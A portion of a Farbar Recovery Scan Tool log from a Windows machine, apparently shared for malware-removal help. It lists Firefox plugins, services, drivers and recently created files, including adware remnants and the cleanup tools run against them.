    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-09-05] (Microsoft Corporation)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-04] (VideoLAN)
    FF Extension: (Firefox Hotfix) - C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-19]
    FF Extension: (Video DownloadHelper) - C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-09-16]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
    R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2980032 2016-09-05] (Microsoft Corporation)
    R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
    R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
    S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S3 atmeltpm; C:\Windows\system32\drivers\atmeltpm64.sys [19456 2012-05-25] (Atmel, Inc.)
    S3 BCMTPM; C:\Windows\system32\drivers\btpmwx64.sys [32096 2012-05-25] (Broadcom Corp.)
    S3 d554gps; C:\Windows\system32\drivers\d554gps64.sys [102440 2012-06-18] (Ericsson AB)
    S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
    S3 ecnssndis; C:\Windows\System32\Drivers\wwuss64.sys [26664 2012-06-18] (Ericsson AB)
    S3 ecnssndisfltr; C:\Windows\System32\Drivers\wwussf64.sys [29736 2012-06-18] (Ericsson AB)
    R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
    R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-09-19] (Malwarebytes)
    R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64896 2016-03-10] (Malwarebytes Corporation)
    S3 Mbm3CBus; C:\Windows\system32\drivers\Mbm3CBus.sys [419400 2012-06-18] (MCCI Corporation)
    S3 Mbm3DevMt; C:\Windows\system32\drivers\Mbm3DevMt.sys [430664 2012-06-18] (MCCI Corporation)
    S3 nwdelgobi3kfilter; C:\Windows\system32\drivers\nwdelgobi3kfilter.sys [34304 2012-11-06] (Novatel Wireless Inc)
    S3 NWDellPort; C:\Windows\system32\drivers\nwdelser.sys [222208 2012-11-06] (Novatel Wireless Inc.)
    S3 NWDellPort2; C:\Windows\system32\drivers\nwdelser2.sys [222208 2012-11-06] (Novatel Wireless Inc.)
    S3 nwdelserial; C:\Windows\system32\drivers\nwdelserial.sys [234112 2012-11-06] (Novatel Wireless Inc.)
    S3 qcfilterdl2k; C:\Windows\system32\drivers\qcfilterdl2k.sys [6400 2012-07-05] (QUALCOMM Incorporated)
    S3 qcombusdl; C:\Windows\system32\drivers\qcombusdl.sys [137800 2012-07-05] (MCCI)
    S3 qcusbserdl2k; C:\Windows\system32\drivers\qcusbserdl2k.sys [230784 2012-07-05] (QUALCOMM Incorporated)
    R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
    R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
    S3 stmtpm; C:\Windows\system32\drivers\stm_tpm.sys [29184 2012-05-25] (STMicroelectronics, INC)
    R3 ST_ACCEL; C:\Windows\System32\DRIVERS\ST_ACCEL.sys [68208 2012-11-06] (STMicroelectronics)
    S3 tcm; C:\Windows\system32\drivers\tcm.sys [17048 2012-07-04] ()
    U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2016-09-18] ()
    S3 catchme; \??\C:\ComboFix\catchme.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    NETSVCx32: HpSvc -> no filepath.

    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-09-19 03:11 - 2016-09-19 03:11 - 00036789 _____ C:\ComboFix.txt
    2016-09-19 03:08 - 2016-09-19 03:08 - 00000000 ____D C:\Users\Administrator\AppData\Local\CrashRpt
    2016-09-18 22:20 - 2016-09-19 03:12 - 00000000 ____D C:\ComboFix
    2016-09-18 22:20 - 2016-09-18 21:38 - 05658813 ____R (Swearware) C:\Users\Administrator\Desktop\ComboFix.exe
    2016-09-18 21:39 - 2016-09-19 03:11 - 00000000 ____D C:\Qoobox
    2016-09-18 21:39 - 2011-06-26 02:45 - 00256000 _____ C:\WINDOWS\PEV.exe
    2016-09-18 21:39 - 2010-11-07 13:20 - 00208896 _____ C:\WINDOWS\MBR.exe
    2016-09-18 21:39 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\WINDOWS\NIRCMD.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\WINDOWS\SWREG.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\WINDOWS\SWSC.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00098816 _____ C:\WINDOWS\sed.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00080412 _____ C:\WINDOWS\grep.exe
    2016-09-18 21:39 - 2000-08-30 20:00 - 00068096 _____ C:\WINDOWS\zip.exe
    2016-09-18 21:38 - 2016-09-19 03:10 - 00000000 ____D C:\WINDOWS\erdnt
    2016-09-18 21:38 - 2016-09-18 21:38 - 05658813 ____R (Swearware) C:\Users\Administrator\Downloads\ComboFix.exe
    2016-09-18 21:09 - 2016-09-18 21:09 - 00006874 _____ C:\Users\Administrator\Desktop\JRT.txt
    2016-09-18 21:07 - 2016-09-18 21:07 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\KuaiZip
    2016-09-18 20:56 - 2016-09-18 21:02 - 00000000 ____D C:\AdwCleaner
    2016-09-18 20:51 - 2016-09-18 20:51 - 00165985 _____ C:\malware scan log1.txt
    2016-09-18 20:38 - 2016-09-18 20:38 - 00006960 _____ C:\mwbits.txt
    2016-09-18 20:15 - 2016-09-18 20:58 - 00000000 ____D C:\Users\Administrator\AppData\Local\CrashDumps
    2016-09-18 20:09 - 2016-09-19 18:41 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2016-09-18 20:09 - 2016-09-18 21:00 - 00000000 ____D C:\Program Files (x86)\KuaiZip
    2016-09-18 20:09 - 2016-09-18 20:43 - 00001102 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
    2016-09-18 20:09 - 2016-09-18 20:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
    2016-09-18 20:09 - 2016-09-18 20:09 - 00000000 ____D C:\ProgramData\Malwarebytes
    2016-09-18 20:09 - 2016-09-18 20:09 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
    2016-09-18 20:09 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
    2016-09-18 20:09 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
    2016-09-18 20:09 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2016-09-18 20:05 - 2016-09-18 20:05 - 00144744 _____ C:\Users\Administrator\Documents\RKreport E446.tmp.txt
    2016-09-18 19:22 - 2016-09-18 19:22 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
    2016-09-18 19:21 - 2016-09-18 20:43 - 00000902 _____ C:\Users\Public\Desktop\RogueKiller.lnk
    2016-09-18 19:21 - 2016-09-18 19:21 - 00000000 ____D C:\ProgramData\RogueKiller
    2016-09-18 19:21 - 2016-09-18 19:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
    2016-09-18 19:21 - 2016-09-18 19:21 - 00000000 ____D C:\Program Files\RogueKiller
    2016-09-18 19:02 - 2016-09-18 19:03 - 01610560 _____ (Malwarebytes) C:\Users\Administrator\Downloads\JRT.exe
    2016-09-18 19:02 - 2016-09-18 19:02 - 03861056 _____ C:\Users\Administrator\Downloads\adwcleaner_6.020.exe
    2016-09-18 19:01 - 2016-09-18 19:02 - 22851472 _____ (Malwarebytes ) C:\Users\Administrator\Downloads\mbam-setup-2.2.1.1043.exe
    2016-09-18 18:59 - 2016-09-18 19:00 - 33565440 _____ (Adlice Software ) C:\Users\Administrator\Downloads\setup.exe
    2016-09-18 11:58 - 2016-09-18 11:58 - 00028081 _____ C:\Users\Administrator\Downloads\Addition.txt
    2016-09-18 11:57 - 2016-09-19 20:30 - 00012282 _____ C:\Users\Administrator\Downloads\FRST.txt
    2016-09-18 11:57 - 2016-09-19 20:30 - 00000000 ____D C:\FRST
    2016-09-18 11:57 - 2016-09-18 11:57 - 02399232 _____ (Farbar) C:\Users\Administrator\Downloads\FRST64.exe
    2016-09-18 11:05 - 2016-09-18 11:09 - 00172700 _____ C:\WINDOWS\ntbtlog.txt
    2016-09-18 10:49 - 2016-09-18 10:50 - 49521912 _____ (www.ludashi.com) C:\Users\Administrator\Downloads\ludashisetup.exe
    2016-09-18 10:48 - 2016-09-18 20:43 - 00001153 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2016-09-18 10:48 - 2016-09-18 20:43 - 00001147 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2016-09-18 10:48 - 2016-09-18 10:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
    2016-09-18 10:48 - 2016-09-18 10:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
    2016-09-18 09:15 - 2016-09-18 09:15 - 00003110 _____ C:\WINDOWS\System32\Tasks\{AC769F71-F24C-4982-9CD9-2399739747D0}
    2016-09-18 09:09 - 2016-09-18 09:09 - 00003120 _____ C:\WINDOWS\System32\Tasks\{9CBDDEFC-08B0-4505-B272-4C0259D93CAD}
    2016-09-18 09:09 - 2016-09-18 09:09 - 00000000 ____D C:\WINDOWS\system32\appmgmt
    2016-09-18 09:08 - 2016-09-18 09:08 - 00003586 _____ C:\WINDOWS\System32\Tasks\{C7D820FC-CDAB-40D6-BEDE-D25C4C86FE7F}
    2016-09-18 09:08 - 2016-09-18 09:08 - 00003106 _____ C:\WINDOWS\System32\Tasks\{5E89D5D4-C91B-4F37-AF11-F0CBE417CCC0}
    2016-09-18 09:06 - 2016-09-18 09:06 - 00003594 _____ C:\WINDOWS\System32\Tasks\{E2E7A15A-991B-470C-85A5-CFECBCB02080}
    2016-09-18 08:49 - 2016-09-18 08:49 - 00000000 ____D C:\WINDOWS\system32\guu
    2016-09-18 08:05 - 2016-09-18 09:57 - 00000000 ____D C:\Program Files (x86)\LuDaShib
    2016-09-18 08:05 - 2016-09-18 08:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\鲁大师
    2016-09-18 08:04 - 2016-09-18 08:50 - 00000000 ____D C:\Program Files\nplusb
    2016-09-18 08:03 - 2016-09-18 09:49 - 00000000 ____D C:\Program Files (x86)\KuaiZipb
    2016-09-18 08:03 - 2016-09-18 08:04 - 07090176 _____ C:\Users\Administrator\AppData\Roaming\agent.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00018432 _____ C:\Users\Administrator\AppData\Roaming\Main.dat
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\Administrator\AppData\Local\A
    2016-09-18 08:01 - 2016-09-18 20:37 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Gajedefsim
    2016-09-18 08:01 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files (x86)\hostb
    2016-09-18 08:01 - 2016-09-18 08:48 - 00000000 ____D C:\Program Files\IcattiUnb
    2016-09-18 08:01 - 2016-09-18 08:01 - 00140288 _____ C:\Users\Administrator\AppData\Roaming\Installer.dat
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\Users\Administrator\AppData\Local\Tempfolder
    2016-09-18 07:59 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files\Casterb
    2016-09-18 07:59 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files (x86)\DPowerb
    2016-09-18 07:58 - 2016-09-18 20:37 - 00000000 ____D C:\Users\Administrator\AppData\Local\Apps\2.0
    2016-09-18 07:58 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files (x86)\EasyHotspotb
    2016-09-18 07:56 - 2016-09-18 07:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Youtube Downloader
    2016-09-18 07:55 - 2016-09-18 07:56 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Interstatnogui
    2016-09-18 06:33 - 2016-09-18 06:33 - 00000000 ____D C:\Users\Default\AppData\Local\Microsoft Help
    2016-09-18 06:33 - 2016-09-18 06:33 - 00000000 ____D C:\Users\Default User\AppData\Local\Microsoft Help
    2016-09-16 21:23 - 2016-09-16 21:25 - 00000000 ____D C:\WINDOWS\system32\MRT
    2016-09-16 21:23 - 2016-09-16 21:23 - 144199024 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2016-09-16 21:12 - 2016-09-18 08:50 - 00000000 ____D C:\SUPERDelete
    2016-09-16 18:49 - 2016-09-16 18:50 - 40326904 _____ C:\Users\Administrator\Downloads\Firefox_Setup.exe
    2016-09-16 18:46 - 2016-09-16 18:46 - 00985288 _____ (Slimware Utilities Holdings, Inc.) C:\Users\Administrator\Downloads\DriverUpdate-setup.exe
    2016-09-16 10:46 - 2016-09-16 11:05 - 00000000 ____D C:\aa Canon 450D Master acum
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\WINDOWS\PCHEALTH
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SharePoint
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 8
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ___RD C:\MSOCache
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ____D C:\Users\Administrator\AppData\Local\Microsoft Help
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ____D C:\Program Files\Microsoft Office
    2016-09-16 10:34 - 2016-09-16 10:35 - 266433120 _____ (Microsoft Corporation) C:\Users\Administrator\Downloads\SharePointDesigner.exe
    2016-09-14 01:10 - 2016-09-01 15:26 - 00394440 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
    2016-09-14 01:10 - 2016-09-01 14:41 - 00346320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
    2016-09-14 01:10 - 2016-08-31 23:18 - 02724864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
    2016-09-14 01:10 - 2016-08-31 23:08 - 20312064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2016-09-14 01:10 - 2016-08-31 22:48 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesetup.dll
    2016-09-14 01:10 - 2016-08-31 22:46 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
    2016-09-14 01:10 - 2016-08-31 22:46 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
    2016-09-14 01:10 - 2016-08-31 22:46 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieetwproxystub.dll
    2016-09-14 01:10 - 2016-08-31 22:44 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
    2016-09-14 01:10 - 2016-08-31 22:34 - 02286592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
    2016-09-14 01:10 - 2016-08-31 22:31 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
    2016-09-14 01:10 - 2016-08-31 22:31 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iernonce.dll
    2016-09-14 01:10 - 2016-08-31 22:26 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
    2016-09-14 01:10 - 2016-08-31 22:24 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
    2016-09-14 01:10 - 2016-08-31 22:24 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieUnatt.exe
    2016-09-14 01:10 - 2016-08-31 22:23 - 00620032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
    2016-09-14 01:10 - 2016-08-31 22:08 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
    2016-09-14 01:10 - 2016-08-31 21:59 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JavaScriptCollectionAgent.dll
    2016-09-14 01:10 - 2016-08-31 21:57 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inseng.dll
    2016-09-14 01:10 - 2016-08-31 21:53 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
    2016-09-14 01:10 - 2016-08-31 21:52 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
    2016-09-14 01:10 - 2016-08-31 21:48 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
    2016-09-14 01:10 - 2016-08-31 21:45 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\occache.dll
    2016-09-14 01:10 - 2016-08-31 21:34 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
    2016-09-14 01:10 - 2016-08-31 21:30 - 00692736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
    2016-09-14 01:10 - 2016-08-31 21:29 - 02055680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
    2016-09-14 01:10 - 2016-08-31 21:29 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmlmedia.dll
    2016-09-14 01:10 - 2016-08-31 21:27 - 13808128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
    2016-09-14 01:10 - 2016-08-31 21:24 - 04607488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
    2016-09-14 01:10 - 2016-08-31 20:45 - 25770496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2016-09-14 01:10 - 2016-08-31 20:43 - 02445824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
    2016-09-14 01:10 - 2016-08-31 20:42 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
    2016-09-14 01:10 - 2016-08-31 20:40 - 02724864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
    2016-09-14 01:10 - 2016-08-31 20:40 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollectorres.dll
    2016-09-14 01:10 - 2016-08-31 20:38 - 01316352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
    2016-09-14 01:10 - 2016-08-31 20:25 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 02894336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00576000 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
    2016-09-14 01:10 - 2016-08-31 20:24 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwproxystub.dll
    2016-09-14 01:10 - 2016-08-31 20:16 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
    2016-09-14 01:10 - 2016-08-31 20:15 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
    2016-09-14 01:10 - 2016-08-31 20:12 - 00615936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
    2016-09-14 01:10 - 2016-08-31 20:11 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieUnatt.exe
    2016-09-14 01:10 - 2016-08-31 20:11 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollector.exe
    2016-09-14 01:10 - 2016-08-31 20:10 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
    2016-09-14 01:10 - 2016-08-31 20:10 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
    2016-09-14 01:10 - 2016-08-31 20:06 - 06047232 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
    2016-09-14 01:10 - 2016-08-31 20:03 - 00968704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MsSpellCheckingFacility.exe
    2016-09-14 01:10 - 2016-08-31 19:59 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
    2016-09-14 01:10 - 2016-08-31 19:51 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\JavaScriptCollectionAgent.dll
    2016-09-14 01:10 - 2016-08-31 19:50 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\inseng.dll
    2016-09-14 01:10 - 2016-08-31 19:47 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
    2016-09-14 01:10 - 2016-08-31 19:46 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
    2016-09-14 01:10 - 2016-08-31 19:44 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
    2016-09-14 01:10 - 2016-08-31 19:42 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\system32\occache.dll
    2016-09-14 01:10 - 2016-08-31 19:31 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
    2016-09-14 01:10 - 2016-08-31 19:29 - 00724992 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2016-09-14 01:10 - 2016-08-31 19:28 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
    2016-09-14 01:10 - 2016-08-31 19:27 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmlmedia.dll
    2016-09-14 01:10 - 2016-08-31 19:26 - 02131456 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
    2016-09-14 01:10 - 2016-08-31 19:15 - 15411712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
    2016-09-14 01:10 - 2016-08-31 19:10 - 02921472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
    2016-09-14 01:10 - 2016-08-31 18:58 - 01550848 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
    2016-09-14 01:10 - 2016-08-31 18:47 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
    2016-09-14 01:10 - 2016-08-12 12:26 - 00464896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
    2016-09-14 01:10 - 2016-08-12 12:26 - 00405504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
    2016-09-14 01:10 - 2016-08-12 12:26 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
    2016-09-14 01:09 - 2016-09-02 11:40 - 00631176 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
    2016-09-14 01:09 - 2016-09-02 11:35 - 05548264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
    2016-09-14 01:09 - 2016-09-02 11:35 - 00706280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
    2016-09-14 01:09 - 2016-09-02 11:35 - 00154856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
    2016-09-14 01:09 - 2016-09-02 11:35 - 00095464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
    2016-09-14 01:09 - 2016-09-02 11:34 - 01732864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00503808 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64win.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00215552 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdigest.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSpkg.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\srclient.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01464320 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01212928 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01163264 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00880640 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00730624 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\system32\adtschema.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00463872 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00419840 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00312320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncrypt.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpchttp.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msaudite.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\setbcdlocale.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msobjs.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidapi.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptbase.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidsvc.dll
